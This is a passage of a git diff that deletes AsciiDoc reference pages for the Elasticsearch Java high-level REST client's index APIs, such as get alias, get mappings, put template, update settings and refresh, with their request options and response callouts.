c51f9fe5b95..00000000000 --- a/docs/java-rest/high-level/indices/get_alias.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ --- -:api: get-alias -:request: GetAliasesRequest -:response: GetAliasesResponse --- - -[id="{upid}-{api}"] -=== Get Alias API - -[id="{upid}-{api}-request"] -==== Get Alias Request - -The Get Alias API uses +{request}+ as its request object. -One or more aliases can be optionally provided either at construction -time or later on through the relevant setter method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-alias] --------------------------------------------------- -<1> One or more aliases to retrieve - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> The index or indices that the alias is associated with - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded when looking for aliases that belong to -specified indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> The `local` flag (defaults to `false`) controls whether the aliases need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Alias Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieves a map of indices and their aliases - -+{response}+ class contains information about errors if they occurred. -This info could be in fields `error` or `exception` depends on a case. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-error] --------------------------------------------------- -<1> Client sets status to `NOT_FOUND` if at least one item of specified -indices or aliases is not found. Otherwise it is `OK`. - -<2> If at least one item of specified indices isn't exist client sets -`ElasticsearchException` and returns empty result. - -<3> If at least one item of specified aliases ins't exist client puts -error description in `error` field and returns partial result if any -of other patterns match. - -If user specified indices or aliases as regular expressions -and nothing was found client returns `OK` status and no errors. diff --git a/docs/java-rest/high-level/indices/get_field_mappings.asciidoc b/docs/java-rest/high-level/indices/get_field_mappings.asciidoc deleted file mode 100644 index 4d8117c15fe..00000000000 --- a/docs/java-rest/high-level/indices/get_field_mappings.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ --- -:api: get-field-mappings -:request: GetFieldMappingsRequest -:response: GetFieldMappingsResponse --- - -[id="{upid}-{api}"] -=== Get Field Mappings API - -[id="{upid}-{api}-request"] -==== Get Field Mappings Request - -A +{request}+ can have an optional list of indices, optional list of types and the list of fields: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> An empty request -<2> Setting the indices to fetch mapping for -<3> The fields to be returned - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-local] --------------------------------------------------- -<1> deprecated:[7.8.0, This parameter is a no-op and field mappings are always retrieved locally] -The `local` flag (defaults to `false`) controls whether the aliases need -to be looked up in the local cluster state or in the cluster state held by -the elected master node - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] - -==== Get Field Mappings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Returning all requested indices fields' mappings -<2> Retrieving the mappings for a particular index -<3> Getting the mappings metadata for the `message` field -<4> Getting the full name of the field -<5> Getting the mapping source of the field - diff --git a/docs/java-rest/high-level/indices/get_index.asciidoc b/docs/java-rest/high-level/indices/get_index.asciidoc deleted file mode 100644 index 8698bff7d7c..00000000000 --- a/docs/java-rest/high-level/indices/get_index.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ --- -:api: get-index -:request: GetIndexRequest -:response: GetIndexResponse --- - -[id="{upid}-{api}"] -[[java-rest-high-get-index]] -=== Get Index API - -[id="{upid}-{api}-request"] -==== Get Index Request - -A +{request}+ requires one or more `index` arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index whose information we want to retrieve - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-includeDefaults] --------------------------------------------------- -<1> If true, defaults will be returned for settings not explicitly set on the index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Retrieve a Map of different types to `MappingMetadata` for `index`. -<2> Retrieve a Map for the properties for document type `doc`. -<3> Get the list of aliases for `index`. -<4> Get the value for the setting string `index.number_of_shards` for `index`. If the setting was not explicitly -specified but was part of the default settings (and includeDefault was `true`) then the default setting would be -retrieved. -<5> Retrieve all settings for `index`. -<6> The `Settings` objects gives more flexibility. Here it is used to extract the setting `index.number_of_shards` as an -integer. -<7> Get the default setting `index.refresh_interval` (if `includeDefault` was set to `true`). If `includeDefault` was set -to `false`, `getIndexResponse.defaultSettings()` will return an empty map. \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/get_index_template.asciidoc b/docs/java-rest/high-level/indices/get_index_template.asciidoc deleted file mode 100644 index 3ddbfc7e8c3..00000000000 --- a/docs/java-rest/high-level/indices/get_index_template.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: get-index-templates-v2 -:request: GetIndexTemplateV2Request -:response: GetIndexTemplatesV2Response --- - -[id="{upid}-{api}"] -=== Get Composable Index Templates API - -The Get Index Templates API allows to retrieve information about one or more index templates. - -[id="{upid}-{api}-request"] -==== Get Composable Index Templates Request - -A +{request}+ specifies one, or a wildcard expression of index template names -to get. To return all index templates, omit the name altogether or use a value of `*`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> An index template name using wildcard - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Templates Response - -The returned +{response}+ consists a map of index template names and their corresponding configurations. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A map of matching index templates names and the corresponding configurations diff --git a/docs/java-rest/high-level/indices/get_mappings.asciidoc b/docs/java-rest/high-level/indices/get_mappings.asciidoc deleted file mode 100644 index 516e0633f83..00000000000 --- a/docs/java-rest/high-level/indices/get_mappings.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ --- -:api: get-mappings -:request: GetMappingsRequest -:response: GetMappingsResponse --- - -[id="{upid}-{api}"] -=== Get Mappings API - -[id="{upid}-{api}-request"] -==== Get Mappings Request - -A +{request}+ can have an optional list of indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> An empty request that will return all indices -<2> Setting the indices to fetch mapping for - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Options for expanding indices names - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Mappings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Returning all indices' mappings -<2> Retrieving the mappings for a particular index -<3> Getting the mappings as a Java Map diff --git a/docs/java-rest/high-level/indices/get_settings.asciidoc b/docs/java-rest/high-level/indices/get_settings.asciidoc deleted file mode 100644 index d0d30f25728..00000000000 --- a/docs/java-rest/high-level/indices/get_settings.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ --- -:api: get-settings -:request: GetSettingsRequest -:response: GetSettingsResponse --- - -[id="{upid}-{api}"] -=== Get Settings API - -[id="{upid}-{api}-request"] -==== Get Settings Request - -A +{request}+ requires one or more `index` arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index whose settings we should retrieve - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-names] --------------------------------------------------- -<1> One or more settings that be the only settings retrieved. If unset, all settings will be retrieved - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-include-defaults] --------------------------------------------------- -<1> If true, defaults will be returned for settings not explicitly set on the index - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> We can retrieve the setting value for a particular index directly from the response as a string -<2> We can also retrieve the Settings object for a particular index for further examination -<3> The returned Settings object provides convenience methods for non String types - -If the `includeDefaults` flag was set to true in the +{request}+ the -behavior of +{response}+ will differ somewhat. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-defaults-response] --------------------------------------------------- -<1> Individual default setting values may be retrieved directly from the +{response}+ -<2> We may retrieve a Settings object for an index that contains those settings with default values diff --git a/docs/java-rest/high-level/indices/get_templates.asciidoc b/docs/java-rest/high-level/indices/get_templates.asciidoc deleted file mode 100644 index 07460a64a64..00000000000 --- a/docs/java-rest/high-level/indices/get_templates.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ --- -:api: get-templates -:request: GetIndexTemplatesRequest -:response: GetIndexTemplatesResponse --- - -[id="{upid}-{api}"] -=== Get Templates API - -The Get Templates API allows to retrieve a list of index templates by name. - -[id="{upid}-{api}-request"] -==== Get Index Templates Request - -A +{request}+ specifies one or several names of the index templates to get. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> A single index template name -<2> Multiple index template names -<3> An index template name using wildcard - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Templates Response - -The returned +{response}+ consists a list of matching index templates. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A list of matching index templates \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/indices_exists.asciidoc b/docs/java-rest/high-level/indices/indices_exists.asciidoc deleted file mode 100644 index a830ab54d3b..00000000000 --- a/docs/java-rest/high-level/indices/indices_exists.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: indices-exists -:request: GetIndexRequest -:response: boolean --- - -[id="{upid}-{api}"] -=== Index Exists API - -[id="{upid}-{api}-request"] -==== Index Exists Request - -The high-level REST client uses a +{request}+ for Index Exists API. The index name (or indices' names) are required. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Index - -[[java-rest-high-indices-exists-optional-args]] -==== Optional arguments -Index exists API also accepts following optional arguments, through a +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-optionals] --------------------------------------------------- -<1> Whether to return local information or retrieve the state from master node -<2> Return result in a format suitable for humans -<3> Whether to return all default setting for each of the indices -<4> Controls how unavailable indices are resolved and how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response -The response is a +{response}+ value, indicating whether the index (or indices) exist. diff --git a/docs/java-rest/high-level/indices/open_index.asciidoc b/docs/java-rest/high-level/indices/open_index.asciidoc deleted file mode 100644 index 84f038e154a..00000000000 --- a/docs/java-rest/high-level/indices/open_index.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ --- -:api: open-index -:request: OpenIndexRequest -:response: OpenIndexResponse --- - -[id="{upid}-{api}"] -=== Open Index API - -[id="{upid}-{api}-request"] -==== Open Index Request - -An +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to open - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the index is opened -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-waitForActiveShards] --------------------------------------------------- -<1> The number of active shard copies to wait for before the open index API -returns a response, as an `int` -<2> The number of active shard copies to wait for before the open index API -returns a response, as an `ActiveShardCount` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Open Index Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request -<2> Indicates whether the requisite number of shard copies were started for -each shard in the index before timing out diff --git a/docs/java-rest/high-level/indices/put_index_template.asciidoc b/docs/java-rest/high-level/indices/put_index_template.asciidoc deleted file mode 100644 index 9a1748da0fe..00000000000 --- a/docs/java-rest/high-level/indices/put_index_template.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ --- -:api: put-index-template-v2 -:request: PutIndexTemplateV2Request -:response: AcknowledgedResponse --- - -[id="{upid}-{api}"] -=== Put Composable Index Template API - -[id="{upid}-{api}-request"] -==== Put Composable Index Template Request - -A +{request}+ specifies the `name` of a template and the index template configuration -which consists of the `patterns` that control whether the template should be applied -to the new index, and the optional mappings, settings and aliases configuration. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the template -<2> The index template configuration that specifies the index name patterns this template will match - -==== Settings -The settings of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this template -<2> Configure the settings on the template building block -<3> Create the IndexTemplateV2 object that configures the index template to apply the defined template to indices matching the patterns - -==== Mappings -The mapping of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-json] --------------------------------------------------- -<1> The mapping, provided as a JSON string -<2> Configure the mapping on the template building block - -==== Aliases -The aliases of the template will define aliasing to the index whose name matches the -template's patterns. A placeholder `{index}` can be used in an alias of a template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define -<2> The alias to define with placeholder -<3> Configure the aliases on the template building block - -==== Component templates -Component templates can be used as building blocks for specifying mappings, settings or aliases -configurations, but they don't apply to indices themselves. To be applied to an index, the -component templates must be specified in the `componentTemplates` list of the `IndexTemplateV2` -index template definition object. The order in which they are specified in the list is the order -in which the component templates are applied. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-component-template] --------------------------------------------------- -<1> The component template used by this index template - -==== Priority -In case multiple templates match an index, the priority of matching templates determines -the index template which will be applied. -Index templates with higher priority "win" over index templates with lower priority. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-priority] --------------------------------------------------- -<1> The priority of the template - -==== Version -A template can optionally specify a version number which can be used to simplify template -management by external systems. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> The version number of the template - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-create] --------------------------------------------------- -<1> To force to only create a new template; do not overwrite the existing template - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Composable Index Template Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/put_mapping.asciidoc b/docs/java-rest/high-level/indices/put_mapping.asciidoc deleted file mode 100644 index 971ad52d62b..00000000000 --- a/docs/java-rest/high-level/indices/put_mapping.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ --- -:api: put-mapping -:request: PutMappingRequest -:response: PutMappingResponse --- - -[id="{upid}-{api}"] -=== Put Mapping API - -[id="{upid}-{api}-request"] -==== Put Mapping Request - -A +{request}+ requires an `index` argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The index to add the mapping to - -==== Mapping source -A description of the fields to create on the mapping; if not defined, the mapping will default to empty. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-source] --------------------------------------------------- -<1> Mapping source provided as a `String` - -==== Providing the mapping source -The mapping source can be provided in different ways in addition to -the `String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the index creation as a `TimeValue` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Mapping Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/put_settings.asciidoc b/docs/java-rest/high-level/indices/put_settings.asciidoc deleted file mode 100644 index f798482bfdd..00000000000 --- a/docs/java-rest/high-level/indices/put_settings.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ --- -:api: indices-put-settings -:request: UpdateSettingsRequest -:response: UpdateSettingsResponse --- - -[id="{upid}-{api}"] -=== Update Indices Settings API - -The Update Indices Settings API allows to change specific index level settings. - -[id="{upid}-{api}-request"] -==== Update Indices Settings Request - -An +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Update settings for one index -<2> Update settings for multiple indices -<3> Update settings for all indices - -==== Indices Settings -At least one setting to be updated must be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Sets the index settings to be applied - -==== Providing the Settings -The settings to be applied can be provided in different ways: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-create-settings] --------------------------------------------------- -<1> Creates a setting as `Settings` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-builder] --------------------------------------------------- -<1> Settings provided as `Settings.Builder` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-source] --------------------------------------------------- -<1> Settings provided as `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-map] --------------------------------------------------- -<1> Settings provided as a `Map` - -==== Optional Arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preserveExisting] --------------------------------------------------- -<1> Whether to update existing settings. If set to `true` existing settings -on an index remain unchanged, the default is `false` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-timeout] --------------------------------------------------- -<1> Timeout to wait for the all the nodes to acknowledge the new setting -as a `TimeValue` -<2> Timeout to wait for the all the nodes to acknowledge the new setting -as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Update Indices Settings Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/put_template.asciidoc b/docs/java-rest/high-level/indices/put_template.asciidoc deleted file mode 100644 index 3e395430873..00000000000 --- a/docs/java-rest/high-level/indices/put_template.asciidoc +++ /dev/null @@ -1,132 +0,0 @@ --- -:api: put-template -:request: PutIndexTemplateRequest -:response: PutIndexTemplateResponse --- - -[id="{upid}-{api}"] -=== Put Template API - -[id="{upid}-{api}-request"] -==== Put Index Template Request - -A +{request}+ specifies the `name` of a template and `patterns` -which controls whether the template should be applied to the new index. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The name of the template -<2> The patterns of the template - -==== Settings -The settings of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-settings] --------------------------------------------------- -<1> Settings for this template - -[[java-rest-high-put-template-request-mappings]] -==== Mappings -The mapping of the template will be applied to the new index whose name matches the -template's patterns. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-json] --------------------------------------------------- -<1> The mapping, provided as a JSON string - -The mapping source can be provided in different ways in addition to the -`String` example shown above: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-map] --------------------------------------------------- -<1> Mapping source provided as a `Map` which gets automatically converted -to JSON format - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-mappings-xcontent] --------------------------------------------------- -<1> Mapping source provided as an `XContentBuilder` object, the Elasticsearch -built-in helpers to generate JSON content - -==== Aliases -The aliases of the template will define aliasing to the index whose name matches the -template's patterns. A placeholder `{index}` can be used in an alias of a template. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aliases] --------------------------------------------------- -<1> The alias to define -<2> The alias to define with placeholder - -==== Order -In case multiple templates match an index, the orders of matching templates determine -the sequence that settings, mappings, and alias of each matching template is applied. -Templates with lower orders are applied first, and higher orders override them. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-order] --------------------------------------------------- -<1> The order of the template - -==== Version -A template can optionally specify a version number which can be used to simplify template -management by external systems. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-version] --------------------------------------------------- -<1> The version number of the template - -==== Providing the whole source -The whole source including all of its sections (mappings, settings and aliases) -can also be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-whole-source] --------------------------------------------------- -<1> The source provided as a JSON string. It can also be provided as a `Map` -or an `XContentBuilder`. - -==== Optional arguments -The following arguments can optionally be provided: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-create] --------------------------------------------------- -<1> To force to only create a new template; do not overwrite the existing template - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-masterTimeout] --------------------------------------------------- -<1> Timeout to connect to the master node as a `TimeValue` -<2> Timeout to connect to the master node as a `String` - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Put Index Template Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Indicates whether all of the nodes have acknowledged the request diff --git a/docs/java-rest/high-level/indices/refresh.asciidoc b/docs/java-rest/high-level/indices/refresh.asciidoc deleted file mode 100644 index a8f812c3ed3..00000000000 --- a/docs/java-rest/high-level/indices/refresh.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ --- -:api: refresh -:request: RefreshRequest -:response: RefreshResponse --- - -[id="{upid}-{api}"] -=== Refresh API - -[id="{upid}-{api}-request"] -==== Refresh Request - -A +{request}+ can be applied to one or more indices, or even on `_all` the indices: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Refresh one index -<2> Refresh multiple indices -<3> Refresh all the indices - -==== Optional arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Refresh Response - -The returned +{response}+ allows to retrieve information about the -executed operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Total number of shards hit by the refresh request -<2> Number of shards where the refresh has succeeded -<3> Number of shards where the refresh has failed -<4> A list of failures if the operation failed on one or more shards - -By default, if the indices were not found, an `ElasticsearchException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-notfound] --------------------------------------------------- -<1> Do something if the indices to be refreshed were not found \ No newline at end of file diff --git a/docs/java-rest/high-level/indices/reload_analyzers.asciidoc b/docs/java-rest/high-level/indices/reload_analyzers.asciidoc deleted file mode 100644 index 29db206bf14..00000000000 --- a/docs/java-rest/high-level/indices/reload_analyzers.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: reload-analyzers -:request: ReloadAnalyzersRequest -:response: 